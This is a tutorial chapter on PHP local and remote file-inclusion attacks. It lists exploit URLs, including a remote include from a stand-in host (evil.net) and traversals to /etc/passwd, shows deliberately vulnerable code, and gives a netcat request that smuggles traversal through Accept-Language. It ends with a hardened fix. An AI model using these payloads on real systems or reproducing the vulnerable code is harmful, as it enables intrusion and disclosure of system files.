Variable Poisoning :: Chapter 5

[Past Exploits]
  1. ./?page=ftp://user:pass@evil.net/arbitrary_code.php
  2. ./?page=../../../../../../../etc/passwd
  3. ./?page=....//....//....//....//....//....//....//etc/passwd%00.php
[New Code]
  // php.ini :: allow_url_fopen = Off   (shuts the door on exploit 1, remote ftp:// includes)
  if (!preg_match ('/\.php$/i', $_GET['page'])) {
      die ('Invalid request.');
  }
  $include_file = $_GET['page'];
  // Strip '../' until none is left, so the '....//' nesting of exploit 3 no longer survives.
  while (stristr ($include_file, '../')) {
      $include_file = str_replace ('../', '', $include_file);
  }
  // Accept-Language: en-us,en;q=0.8,pt-br;q=0.5,es;q=0.3
  // explode() stands in for the removed split(); the first tag of the header becomes
  // the language directory without any validation.
  $lang = explode (';', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
  $lang = explode (',', $lang[0]);
  $path = '/path/to/file/' . $lang[0] . '/';
  if (file_exists ($path . $include_file)) {
      include $path . $include_file;
  }
[Attack]
  []$ nc example.org 80 # netcat ;-)
  GET /?page=passwd%00.php HTTP/1.1
  Host: 127.0.0.1
  Accept-Language: ../../../../../../etc,en-us,es;q=0.7,en;q=0.3

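As an added example that is not part of the chapter, here is the same include logic hardened against both halves of the attack: the language tag is matched against the set of directories that actually exist instead of being trusted, and the page name is matched against an allowlist and resolved with realpath(), so neither the header nor ?page= can carry traversal or a null byte into the filesystem call. The content root, the language list and the page names are assumptions.

```php
<?php
// Added example, not part of the chapter: the same include logic, hardened.
// Assumed: the content root, the shipped language list and the page names.
declare(strict_types=1);

const BASE_DIR  = '/path/to/file';                 // assumed, as on the page
const LANGUAGES = ['en-us', 'en', 'pt-br', 'es'];  // directories that exist
const PAGES     = ['index', 'about', 'contact'];   // assumed page names

function pick_language(string $acceptLanguage): string
{
    // Take the first tag in the header that we actually ship; anything else,
    // including '../../../../../../etc', is ignored and 'en' is used instead.
    foreach (explode(',', $acceptLanguage) as $entry) {
        $tag = strtolower(trim(explode(';', $entry, 2)[0]));
        if (in_array($tag, LANGUAGES, true)) {
            return $tag;
        }
    }
    return 'en';
}

function resolve_page(string $page, string $lang): ?string
{
    // Allowlist match only: no dots, slashes or NUL bytes from ?page= ever
    // reach the filesystem, so neither traversal nor %00 truncation applies.
    if (!in_array($page, PAGES, true)) {
        return null;
    }
    $root = realpath(BASE_DIR);
    $real = realpath(BASE_DIR . '/' . $lang . '/' . $page . '.php');
    // Belt and braces: the resolved file must still sit under the resolved root.
    if ($root === false || $real === false || strpos($real, $root . '/') !== 0) {
        return null;
    }
    return $real;
}

$page = $_GET['page'] ?? '';
$lang = pick_language($_SERVER['HTTP_ACCEPT_LANGUAGE'] ?? '');
$file = is_string($page) ? resolve_page($page, $lang) : null;
if ($file === null) {
    http_response_code(400);
    die('Invalid request.');
}
include $file;
```

With this in place the request in the Attack section is answered with a 400: the header's first tag is not in LANGUAGES, and "passwd\0.php" is not in PAGES, so no path is ever built from either value.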